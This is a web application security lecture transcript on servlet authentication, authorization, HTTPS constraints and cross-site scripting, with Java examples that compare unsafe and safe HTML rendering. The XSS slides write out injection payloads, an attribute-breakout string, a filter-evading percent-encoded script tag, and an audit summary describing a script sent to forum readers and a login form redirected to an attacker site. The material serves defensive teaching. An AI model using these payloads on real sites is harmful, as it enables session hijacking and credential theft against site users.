COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

Presentation transcript:

COMP 321 Week 12

Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction

Types of “Bad Guys” Impersonators: pretend to be someone with access Upgraders: have valid accounts, but increase their access level Eavesdroppers: listen in on web traffic

Security Answer Authentication: foils impersonators Authorization: foils upgraders Confidentiality: foils eavesdroppers Data Integrity: foils anyone who tampers with traffic in transit

HTTP Authentication
1. Client requests protected resource
2. Container returns 401 Unauthorized with a WWW-Authenticate header naming the realm
3. Browser asks the user for username and password
4. Browser requests the resource again with the credentials in an Authorization header (and keeps sending them on every later request to that realm, which is why BASIC has no real "log out")
5. Container verifies the credentials against its realm
6. Container returns the resource

Authorization - Defining Roles
Users, their passwords and their roles are defined in the container's user store; for Tomcat that is conf/tomcat-users.xml:

    <tomcat-users>
      <!-- user and role entries go here -->
    </tomcat-users>

The web application declares which role names it uses, and how users log in, in its deployment descriptor (web.xml):

    <security-role><role-name>Admin</role-name></security-role>
    <security-role><role-name>Member</role-name></security-role>
    <security-role><role-name>Guest</role-name></security-role>
    <login-config>
      <auth-method>BASIC</auth-method>
    </login-config>

Authorization - Defining Constraints
A <security-constraint> in web.xml names the resources (URL patterns plus HTTP methods) and the roles allowed to reach them:

    <security-constraint>
      <web-resource-collection>
        <web-resource-name>UpdateRecipes</web-resource-name>
        <url-pattern>/Beer/AddRecipe/*</url-pattern>
        <url-pattern>/Beer/ReviewRecipe/*</url-pattern>
        <http-method>GET</http-method>
        <http-method>POST</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>Admin</role-name>
        <role-name>Member</role-name>
      </auth-constraint>
    </security-constraint>
    </web-app>

Caveat: listing <http-method> elements constrains only those methods. HEAD, PUT, DELETE, OPTIONS and TRACE requests to the same URLs are not protected, and HttpServlet's default doHead() runs doGet(), so a HEAD request reaches the GET code without any role check. Either omit <http-method> (the constraint then covers every method) or, on a Servlet 3.1 or newer container, add <deny-uncovered-http-methods/> to web.xml.

Sharpen Your Pencil
Consider the code below. What security step must have happened before this snippet runs? What security step is implied by this snippet? What part, if any, does the DD play in this snippet? How do you think this code works? What if the role of Manager doesn't exist in your container?

    // In servlet
    if (request.isUserInRole("Manager")) {
      // Do something
    } else {
      // Do something else
    }

Sharpen Your Pencil
Consider the code above. What security step must have happened before this snippet runs? Authentication. What security step is implied by this snippet? Authorization. What part, if any, does the DD play in this snippet? It can be used to link the role name Manager used in the code to a role defined in the container, with a <security-role-ref> inside the servlet's <servlet> element:

    <security-role-ref>
      <role-name>Manager</role-name>
      <role-link>Admin</role-link>
    </security-role-ref>

How do you think this code works? The container looks up the authenticated user's roles in its realm and compares them with the linked role. What if the role of Manager doesn't exist in your container? If there is neither a <security-role-ref> nor a <security-role> named Manager, isUserInRole("Manager") returns false (it also returns false for a user who has not authenticated), so the check fails closed rather than open.
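The snippet filled out into a complete servlet, as an added example and not code from the slides or the course. RecipeAdminServlet, its URL mapping and the text it returns are hypothetical; it assumes a Servlet 3.0 or newer container (for request.authenticate()) and a DD that declares the role name Manager or links it to a container role through a <security-role-ref>.

```java
// Added example, not from the slides: the "Sharpen Your Pencil" snippet
// as a complete servlet. RecipeAdminServlet and its mapping are hypothetical;
// the only thing it assumes from the DD is that the role name "Manager" is
// either declared as a <security-role> or linked to one (e.g. Admin) through
// a <security-role-ref> in this servlet's <servlet> element.
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class RecipeAdminServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        // Step 1, authentication. Normally a <security-constraint> on this URL
        // makes the container log the user in before doGet() runs. If the URL
        // is not constrained, authenticate() (Servlet 3.0) triggers the
        // configured login mechanism itself and returns false until the user
        // has logged in; the challenge or login page has then already been sent.
        if (request.getUserPrincipal() == null && !request.authenticate(response)) {
            return;
        }

        // Step 2, authorization. isUserInRole() asks the container's realm
        // through the role name the code uses. With no matching <security-role>
        // or <security-role-ref> it returns false: the check fails closed.
        if (!request.isUserInRole("Manager")) {
            response.sendError(HttpServletResponse.SC_FORBIDDEN, "Manager role required");
            return;
        }

        // Plain text on purpose: the user name comes from the realm, and in the
        // XSS audit later in this deck the user name was itself an injection point.
        response.setContentType("text/plain;charset=UTF-8");
        PrintWriter out = response.getWriter();
        out.println("Recipe administration for " + request.getRemoteUser());
    }
}
```

Deploy it behind a <security-constraint> on its URL and the authenticate() branch is never taken; leave the constraint out and the servlet still refuses to run for an anonymous or unauthorized user, which is the property to keep whichever way the DD is configured.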

Sharpen Your Pencil
Based on the <auth-constraint> shown, decide who can access the protected resources. Answers from the following slides, with the rule behind each. Note that "everyone" on the slides means every authenticated user in any role declared in the DD; the only way to admit users who have not logged in is to leave the <auth-constraint> element out altogether.

    <auth-constraint><role-name>Guest</role-name></auth-constraint>
  Guest? Yes.

    <auth-constraint></auth-constraint>
  Nobody? Yes. An empty <auth-constraint> denies access to everyone.

    <auth-constraint><role-name>Admin</role-name><role-name>Guest</role-name></auth-constraint>
  Guest? Yes. Admin? Yes.

    <auth-constraint><role-name>Guest</role-name><role-name>*</role-name></auth-constraint>
  Everyone? Yes. * stands for every role declared in the DD, so listing Guest as well changes nothing.

    <auth-constraint><role-name>Member</role-name></auth-constraint>
  combined with a second <security-constraint> on the same resource that has no <auth-constraint> element at all (the second constraint's XML is not visible in the transcript; this is the pairing the combination rules imply)
  Everyone? Yes. A constraint with no <auth-constraint> combines with the others to allow everyone, including users who have not logged in.

    <auth-constraint><role-name>Member</role-name></auth-constraint>
  combined with a second <security-constraint> on the same resource whose <auth-constraint> is empty
  Nobody? Yes. An empty <auth-constraint> is always the final word.

Rules for several constraints covering the same URL pattern and method: the named roles are unioned; * combined with anything gives all authenticated users; a constraint with no <auth-constraint> opens the resource to everyone; an empty <auth-constraint> overrides everything else and closes the resource to nobody.

Authentication
BASIC – Browser pops up a dialog and sends username:password in an Authorization header, encoded in Base64. Base64 is an encoding, not encryption: anyone who sees the request can decode the password, so BASIC is only acceptable over HTTPS
DIGEST – Sends a hash of the password combined with a server nonce instead of the password itself; defined by HTTP, but J2EE does not require containers to support it
CLIENT-CERT – The client authenticates with an X.509 certificate during the HTTPS (TLS) handshake, so no password crosses the wire, but it requires the client to have a certificate installed in the browser
FORM – Allows a custom login form to be created in HTML; the form posts the login information in the clear unless the page is served and submitted over HTTPS

Authentication
Switching the login method from BASIC to FORM and pointing the container at the two pages:

    <login-config>
      <auth-method>FORM</auth-method>
      <form-login-config>
        <form-login-page>/loginPage.html</form-login-page>
        <form-error-page>/loginError.html</form-error-page>
      </form-login-config>
    </login-config>

Authentication
The login page must post to the action j_security_check with fields named j_username and j_password; those three names are fixed by the servlet specification, the rest of the page is yours:

    loginPage.html
    <html><body>
    You need to log in
    <form method="POST" action="j_security_check">
      <input type="text" name="j_username">
      <input type="password" name="j_password">
      <input type="submit" value="Log in">
    </form>
    </body></html>

    loginError.html
    <html><body>Sorry, wrong password.</body></html>

Confidentiality and Data Integrity
A <user-data-constraint> on a security constraint tells the container the resource may only be served over a protected transport; CONFIDENTIAL (and in practice INTEGRAL, which containers treat the same way) means HTTPS:

    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Recipes</web-resource-name>
        <url-pattern>/Beer/UpdateRecipes/*</url-pattern>
        <http-method>POST</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>Member</role-name>
      </auth-constraint>
      <user-data-constraint>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
      </user-data-constraint>
    </security-constraint>

As written this covers POST only: a GET to the same URLs requires neither the Member role nor HTTPS.

Confidentiality and Data Integrity
1. Client requests a constrained resource that has a transport guarantee (/BuyStuff.jsp) over plain HTTP
2. Container sends a redirect (the slide says 301; Tomcat's sendRedirect() actually produces a 302) to the same URL on the HTTPS port
3. Browser makes the same request over the secure connection
4. Container sees the resource is also access-constrained, so with BASIC it responds with 401 and the browser prompts the user to log in (with FORM it would show the login page instead)
5. Browser makes the same request for a third time with credentials included, and finally receives the page
The order matters: the switch to HTTPS happens before the login challenge, so the credentials never travel over plain HTTP.

Cross-Site Scripting A way of putting JavaScript into a vulnerable site so that it is executed by other users' browsers. The script runs with the site's own origin, so it can read those users' cookies and act on the site as them. One of the biggest vulnerabilities on the web right now, along with SQL injection

Cross-Site Scripting
Demo form, which builds an <img> tag from what the user types:
  Image: ______  Alignment: center / left  Width: ______

Attacker
Running their own JavaScript! Typing <script>alert('test')</script> into the Image field puts the script straight into the page. A Width value that starts with a quote, such as ' width=''> followed by the same script tag, closes the width attribute and the <img> tag itself, so the script lands outside them and runs.

Opportunities for “Bad Guys” Change page contents Install malware, and make your site look like the bad guy Steal cookies, and hijack someone else's session

Strategies for Prevention Sanitize the inputs from the user, and make sure they don't contain script Fix the image and width fields in the code that handles form submission. Are we safe now?

Cross-Site Scripting
The same form: Image: ______ Alignment: center / left Width: ______. Only the Image and Width handling was fixed. Alignment is a drop-down, but a drop-down is a client-side control: a request with any string in the alignment parameter can be sent without using the form at all, so that field is still injectable.

XSS Audit David Zimmer performed an XSS audit of a forum site and posted his thought process in an article, World_XSS_3.html

XSS Audit First vulnerability: user name not checked for script tags. He added a script tag that loaded Evil.js to his user name; the name is displayed on every page where the user has posted, so every reader of those pages ran it. Evil.js contained a document.writeln that pulled a resource from his own server, so the server logs showed how many people were affected

XSS Audit Second vulnerability: article name not checked for script tags, but limited to 45 characters. The script tag he wanted to use is 55 characters, so it does not fit. Third vulnerability: user pictures were not validated at upload, simply saved to disk. Upload an "image" file; the server stores it under /images/ with a .jpg name. Change an article title to a short script tag whose src is that .jpg, and now users are attacked just by viewing the article list. The "image" is really a script that sends log data back and then redirects to a real image

XSS Audit Fourth vulnerability: login handling. When a user tries to go to a page that requires an account, the site redirects to the login page and passes the page the user tried to visit along as a referrer parameter, which the login page echoes back unescaped. If the user can be convinced to click a link with a script in that referrer parameter, they will be asked to log in and the script will then be executed on the login page

XSS Audit To make the link less suspicious, we can percent-encode the script in the URL: t%20s%72c%3Db%6Cah%3E%3C%2Fsc%72%69p%74%3E decodes to t src=blah></script>, the tail of a script tag whose src is blah. A filter that looks at the raw URL sees no "script" anywhere; the server's parameter decoding turns it back into one. Then we can make the login form submit to our own site: document.forms(0).action = "

XSS Prevention Don't allow script tags  Do this with a whitelist of what is allowed (characters, lengths, fixed values) rather than a blacklist of what is forbidden; there are too many ways to encode or spell a tag to catch them all  Validate after decoding, and encode every user-supplied value for the HTML context it is written into (text, attribute, URL, script) so that even a value that slips through cannot change the page structure Validate any content that users can upload to your site - text, images, etc. - by checking the file's content, not just its extension (the audit's "image" was a script) Remember that anything running on the client is NOT trusted: drop-downs, hidden fields and JavaScript checks can all be bypassed
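The Image/Alignment/Width demo form rendered three ways, as an added example rather than code from the slides: the unsafe concatenation, the version that fixes only Image and Width (the "Are we safe now?" slide), and a version that whitelists every field and encodes for the attribute context. It also decodes the percent-encoded payload from the login-page audit to show why a blacklist check has to run on decoded input. The class and method names, the accepted alignment values, the image URL pattern and the sample payloads are assumptions of this example; it needs Java 11 or newer.

```java
// Added example, not from the slides: the form handler behind the
// Image/Alignment/Width demo, rendered unsafely, half-fixed, and safely.
// Names, whitelists and payloads below are this example's own choices.
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Set;
import java.util.regex.Pattern;

public class ImageTag {
    static final Set<String> ALLOWED_ALIGN = Set.of("left", "center", "right");
    static final Pattern WIDTH = Pattern.compile("[1-9][0-9]{0,3}");
    // No quotes, angle brackets or whitespace can pass this pattern.
    static final Pattern IMAGE_URL =
        Pattern.compile("https?://[A-Za-z0-9._~:/?#\\[\\]@!$&()*+,;=%-]+");

    /** Vulnerable: user input is pasted straight into the tag. */
    static String renderUnsafe(String image, String align, String width) {
        return "<img src='" + image + "' align='" + align + "' width='" + width + "'>";
    }

    /** Only the two fields the demo attacked are escaped. Are we safe now? */
    static String renderHalfFixed(String image, String align, String width) {
        return "<img src='" + escape(image) + "' align='" + align
             + "' width='" + escape(width) + "'>";
    }

    /** Whitelist every field, then encode for the attribute context anyway. */
    static String renderSafe(String image, String align, String width) {
        if (!ALLOWED_ALIGN.contains(align)) throw new IllegalArgumentException("bad alignment");
        if (!WIDTH.matcher(width).matches()) throw new IllegalArgumentException("bad width");
        if (!IMAGE_URL.matcher(image).matches()) throw new IllegalArgumentException("bad image URL");
        return "<img src='" + escape(image) + "' align='" + escape(align)
             + "' width='" + escape(width) + "'>";
    }

    /** Encode the five characters that matter in HTML text and quoted attributes. */
    static String escape(String s) {
        StringBuilder b = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  b.append("&amp;");  break;
                case '<':  b.append("&lt;");   break;
                case '>':  b.append("&gt;");   break;
                case '"':  b.append("&quot;"); break;
                case '\'': b.append("&#39;");  break;
                default:   b.append(c);
            }
        }
        return b.toString();
    }

    /** A blacklist check: useless on the raw query string, see main(). */
    static boolean mentionsScript(String s) {
        return s.toLowerCase().contains("script");
    }

    public static void main(String[] args) {
        // Constructed payload: closes the quoted attribute and the tag, then adds a script.
        String breakout = "' width=''><script>alert('test')</script><img src='";
        System.out.println(renderUnsafe("x.png", "center", breakout));     // script runs
        System.out.println(renderHalfFixed("x.png", "center", breakout));  // width is now inert
        System.out.println(renderHalfFixed("x.png", breakout, "100"));     // alignment still breaks out
        System.out.println(renderSafe("http://example.com/x.png", "center", "100"));
        try {
            renderSafe("http://example.com/x.png", breakout, "100");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        // The encoded fragment from the login-page audit, before and after decoding.
        String encoded = "t%20s%72c%3Db%6Cah%3E%3C%2Fsc%72%69p%74%3E";
        String decoded = URLDecoder.decode(encoded, StandardCharsets.UTF_8);
        System.out.println(mentionsScript(encoded) + " -> " + decoded + " -> " + mentionsScript(decoded));
    }
}
```

Two things to take from running it. renderHalfFixed() shows that escaping is per field, not per form: the alignment parameter arrives as an arbitrary string whatever the drop-down offered, so the third print still contains a live script tag. The last print shows a blacklist that only sees "script" after URLDecoder has done its work, which is why renderSafe() does not try to recognise attacks at all and instead accepts only the shapes it expects.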

Lab 12-1 Introduction Design solution for the final Lab (13-1) Define Interface for your Actions Design Data Model that will hold the info about: –what actions should be used for which URLs –what JSPs should be used for each return code

Progress Check Due this week Due next week Continue working on Lab 10-1 “JSP User Interfaces”